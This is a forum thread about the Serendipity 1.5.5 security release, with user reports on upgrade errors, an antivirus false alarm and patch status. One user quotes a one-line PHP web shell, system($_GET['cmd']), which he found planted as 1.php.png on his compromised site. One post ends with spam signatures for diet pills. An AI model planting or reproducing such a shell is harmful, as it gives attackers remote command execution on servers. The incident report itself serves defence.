Serendipity 1.5.5 released: IMPORTANT Security Fix

Post Reply
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking »

Hi!

Serendipity 1.5.5 has been released to address a serious security issue. Please read http://blog.s9y.org/archives/224-Import ... eased.html

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
ellisse
Regular
Posts: 5
Joined: Fri Aug 18, 2006 10:08 am
Location: Italy
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by ellisse »

Hi...I'm sorry, but I've found a virus named Obfuscated in plugins\QuickTag\tag-lib.js (AVG Antivirus). Can I safely upgrade serendipity 1.5.5 after the virus elimination?
Thanks
e.
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking »

Hi!

tag-lib.js uses javascript encryption to make the size smaller; this is called "compression". Even though some trojans use this technique, it does not inherently mean a security issue. In this case, the tag-lib.js file does not contain any trojan and is meant to be that way.

If you still feel uncomfortable, you can of course delete that file - it is only required for a specific feature of the Xinha WYSIWYG editing component ("QuickTags").

HTH,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
peacekeeper
Regular
Posts: 13
Joined: Sat Feb 07, 2009 12:54 pm
Location: DE
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by peacekeeper »

Hi,
after I updates S9Y to Version 1.5.5 I cannot create new entrys. I have got the following error alert "Ihr Browser hat keinen gültigen HTTP-Referrer übermittelt. Dies kann entweder daher kommen, dass Ihr Browser/Proxy nicht korrekt konfiguriert ist, oder dass Sie Opfer einer "Cross Site Request Forgery (XSRF)" waren, mit der man Sie zu ungewollten Änderungen zwingen wollte. Die angeforderte Aktion konnte daher nicht durchgeführt werden."

I updated 3 Blogs of my blogs. It´s the same problem on each blog. I tested it on Internet Explorer 8 Firefox and Chrome! Same problem! :-(
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by garvinhicking »

Hi!

From which version did you upgrade from? Did you change anything in your PHP installation and/or .htaccess?

The error usually only happens if the PHP sessions mismatch, or your browser does not submit a "HTTP Referer" string. Also make sure you use the blog domain name to login that is configured inside s9y as the HTTP host.

HTH,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
bryzo
Posts: 0
Joined: Sun Jan 02, 2011 10:22 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by bryzo »

I downloaded 1.5.5 LITE yesterday. Is that download already patched? Or do I need to patch it?
Don Chambers
Regular
Posts: 3652
Joined: Mon Feb 13, 2006 2:40 am
Location: Chicago, IL, USA
Contact:

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Don Chambers »

the lite version should also be the upgraded version.
=Don=
Maccsta
Regular
Posts: 77
Joined: Mon Feb 19, 2007 6:07 am
Location: Leeds, England

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by Maccsta »

I haven't updated some of my blogs for years! Better do this one then!
Check out this blog today!
Buy Eye Secrets strips.
Best devices reviewed at http://www.penisstretchers.org/.
Order Capsiplex slimming pills today.
Buy Meratol diet pills online.
david@mediacopy
Regular
Posts: 56
Joined: Sun May 18, 2008 5:50 pm

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by david@mediacopy »

I've just installed the new version. While checking I found a file called

1.php.png

containing the line <?PHP system($_GET['cmd']); ?>

Looking at the logfile for the site, it had been accessed and they were looking for 1.php.jpg and 2.php.jpg
VideoRob
Regular
Posts: 21
Joined: Fri Feb 01, 2008 6:11 am

Re: Serendipity 1.5.5 released: IMPORTANT Security Fix

Post by VideoRob »

Looks like I should update. I have over 50 blogs that I haved updated in years.
Post Reply